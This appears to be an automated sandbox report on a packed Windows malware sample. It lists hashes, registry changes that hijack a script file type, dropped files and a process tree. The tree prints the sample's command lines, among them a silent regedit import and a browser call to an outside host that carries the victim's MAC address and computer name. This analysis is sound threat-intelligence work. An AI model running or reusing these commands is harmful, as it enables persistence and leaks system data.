a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0

Analysis

max time kernel
153s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
03/10/2022, 07:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe
Size

31KB
MD5

6e9f388f90ef2c3cb21e43a1caa97604
SHA1

06f497d9b24c2316cc1f2a2f4e1271e7c53c2ae6
SHA256

a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0
SHA512

b124bae32a984b455b871e47944f8c520236d8f44850ac90c0f727e5b5d04b57352a8fb082bb1a4deccc553353690dfd2c75f9059a8f2e845c8af07c54670378
SSDEEP

768:Vn1eOBcaAtWQtmNukzaUg43B3JQPfbcG1Tiyb2:VnJwWQt+qI3wbcr

Score

8^/10

upx

Malware Config

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5028-132-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral2/memory/5028-143-0x0000000000400000-0x000000000042A000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\tk.reg	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe
File opened for modification	\??\c:\program files\winrar\xyrzqovtw.vstgi	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe
File created	\??\c:\program files\winrar\1_xyrzqovtw.vstgi	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe
File opened for modification	\??\c:\program files\winrar\pack.wsf	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe
File opened for modification	\??\c:\program files\winrar\xyrzqovtw.vstgi	Cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\My.ini	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 11 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{35BA1DBE-4412-11ED-B696-7ED4F7B3352B} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "Open"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ = "Internet Explorer"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\PropertySheetHandlers\WSHProps\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ScriptHostEncode	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Edit\Command	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\NeverShowExt	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ = "Internet Explorer"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Print\Command\ = "C:\\Windows\\SysWow64\\Notepad.exe /p %1"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers\WSHProps	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%SystemRoot%\\SysWow64\\SHELL32.dll"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\NeverShowExt\	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ScriptEngine\ = "JScript"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ = "????(&H)"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\ = "????(&H)"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Explorer"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\DefaultIcon	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print\Command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vstgi\ = "tkfile"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2\Command	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\IntroText = "Internet Explorer"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "open"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "WScript.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Edit\Command\ = "C:\\Windows\\SysWow64\\Notepad.exe %1"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "C:\\Windows\\SysWow64\\WScript.exe \"%1\" %*"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\IntroText = "Internet Explorer"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers\	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "JScript Script File"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\DropHandler	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ScriptEngine	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\DropHandler\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "1"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "????"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ScriptHostEncode\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open\Command	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\FriendlyTypeName = "@%SystemRoot%\\System32\\wshext.dll,-4804"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon\ = "C:\\Windows\\SysWow64\\WScript.exe,3"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Edit	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\MUIVerb = "@C:\\Windows\\System32\\wshext.dll,-4511"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile	regedit.exe

Runs .reg file with regedit 1 IoCs

pid	Process
4952	regedit.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3480	iexplore.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe
3480	iexplore.exe
3480	iexplore.exe
540	IEXPLORE.EXE
540	IEXPLORE.EXE
540	IEXPLORE.EXE
540	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 5028 wrote to memory of 4160	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	84
PID 5028 wrote to memory of 4160	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	84
PID 5028 wrote to memory of 4160	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	84
PID 4160 wrote to memory of 4952	4160	cmd.exe	86
PID 4160 wrote to memory of 4952	4160	cmd.exe	86
PID 4160 wrote to memory of 4952	4160	cmd.exe	86
PID 5028 wrote to memory of 4732	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	88
PID 5028 wrote to memory of 4732	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	88
PID 5028 wrote to memory of 4732	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	88
PID 4732 wrote to memory of 3980	4732	Cmd.exe	90
PID 4732 wrote to memory of 3980	4732	Cmd.exe	90
PID 4732 wrote to memory of 3980	4732	Cmd.exe	90
PID 5028 wrote to memory of 4292	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	91
PID 5028 wrote to memory of 4292	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	91
PID 5028 wrote to memory of 4292	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	91
PID 5028 wrote to memory of 3480	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	94
PID 5028 wrote to memory of 3480	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	94
PID 3480 wrote to memory of 540	3480	iexplore.exe	96
PID 3480 wrote to memory of 540	3480	iexplore.exe	96
PID 3480 wrote to memory of 540	3480	iexplore.exe	96
PID 5028 wrote to memory of 2228	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	97
PID 5028 wrote to memory of 2228	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	97
PID 5028 wrote to memory of 2228	5028	a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe	97

C:\Users\Admin\AppData\Local\Temp\a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe
"C:\Users\Admin\AppData\Local\Temp\a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4160
- - C:\Windows\SysWOW64\regedit.exe
    regedit /s "C:\Program Files\Common Files\tk.reg"
    3⤵
    - Modifies registry class
    - Runs .reg file with regedit
    PID:4952
- C:\Windows\SysWOW64\Cmd.exe
  Cmd.exe /c CScript /nologo "c:\program files\winrar\pack.wsf" "c:\program files\winrar\1_xyrzqovtw.vstgi" >> "c:\program files\winrar\xyrzqovtw.vstgi"
  2⤵
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:4732
- - C:\Windows\SysWOW64\cscript.exe
    CScript /nologo "c:\program files\winrar\pack.wsf" "c:\program files\winrar\1_xyrzqovtw.vstgi"
    3⤵
    PID:3980
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\SysWow64\WScript.exe" "C:\program files\winrar\xyrzqovtw.vstgi"
  2⤵
  PID:4292
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://u.5136688.com/setuptj.asp?a_ip=&a_mac=7E:D4:F7:B3:35:2B&a_cpname=TMKNGOMU&a_user=me&a_locip=0.0.0.0
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3480
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3480 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:540
- \??\c:\windows\SysWOW64\wscript.exe
  c:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs
  2⤵
  PID:2228

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\tk.reg

Filesize
4KB

MD5
c9156cce795741ec7e8e16ecc96510d5

SHA1
8e77484705c51675c41d65d69e2642655cf70627

SHA256
5fcc15bc307da2316d4cb43d97558682e364be8ea67b6270da0bd5b059339d22

SHA512
c13e6ed6ae61679b15aedd7ee82bf5da0123e43b914e058d533a05aea0efc6a98c21e934d8d2b8e9211d43e1b8a4760d6cf91e8af7d09e77200958a20f86dad8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
afc3e2584b32e1e7c23c33e9534089a5

SHA1
ea4e2266d010c300621d2287ea60fe3e9a9ee753

SHA256
61597f5f937da250a5ed7b4b82867bebc546a5a35c0029982a003b1e9cbd2e7e

SHA512
f0e0d20b15bc390292baf0d93d982315afc466ccd2d4e48152ed65af97aed573d5b9e65b2b50925cbcd2e736955dfec4f63de5739cdb1499eb2db5dfc3cc4fe6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
6653b9fc637b8ab2a20de73d4862c41e

SHA1
546e9f5e7d3ea0dff4ab18e16dd497f2921d9847

SHA256
ccee6a57f1d9a77af169870e4104ba80c1dc0e96ab3ea9a543c656a212f8af0d

SHA512
ebecc288f067e4723380ea3cc1832f51610866197e2325db0bbf0d31afc772f83e717415702e6a47ea2e5f9ee055983ae188b9ff553bd71ec376ca5ec6a5b81f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Killme.vbs

Filesize
307B

MD5
afff93f898e03d9b64b1e052fcdcef7d

SHA1
ac306b8a8e85949943b53900d82cfd2ba4f7df1a

SHA256
ff316f964a1b0e12b5dd359911c44ccb911d5f22f7359de7b916fdce6b5393c5

SHA512
0d347643edeb07a386ec5ff3ee7a9264896abbaa6ffc6cf3e3edad5df3d66ae079a3b03e3e1f6ade0feb4d6488e2d42dfe55450cc7540e95a93631a4a2e287a3

Download Submit
C:\program files\winrar\xyrzqovtw.vstgi

Filesize
75B

MD5
15cebf6ec00aa9e792b7aa1a6fd63217

SHA1
4fa5de7ae7de703369dad92e1dce3b5ea1f6d434

SHA256
c7b5eddd1311bd25322ad19d85ca79dc123e31d5ee4ea4cf04a24bd1c9bfb98a

SHA512
f58985e19d3933599e41990fb97f36b642588a7754889a61cff0b3fca89e1807b6dfc61bd046084167c886c37e9f73a3a5d94b1229f0164a5684aabe57a6c649

Download Submit
memory/5028-132-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/5028-143-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download